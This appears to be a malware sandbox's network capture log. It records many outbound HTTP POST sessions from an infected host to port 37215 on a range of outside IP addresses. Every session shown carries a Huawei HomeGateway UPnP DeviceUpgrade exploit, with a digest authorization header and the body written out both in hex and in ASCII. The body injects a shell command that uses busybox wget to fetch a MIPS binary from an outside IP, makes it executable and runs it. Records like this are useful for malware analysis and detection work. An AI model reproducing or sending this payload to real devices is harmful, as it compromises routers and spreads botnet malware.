                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              502192.168.2.1544664222.234.194.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720462084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              503192.168.2.1537118102.108.78.16637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720464945 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              504192.168.2.154509841.18.46.9737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720504999 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              505192.168.2.154230237.82.150.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720506907 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              506192.168.2.155082231.62.115.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720519066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              507192.168.2.1558992186.158.240.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720551014 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              508192.168.2.1543382138.218.195.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720568895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              509192.168.2.1549164197.61.27.16737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720575094 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              510192.168.2.1536516122.55.7.11337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720629930 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              511192.168.2.1551494121.202.69.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720629930 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              512192.168.2.1551448121.217.33.21137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720649004 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
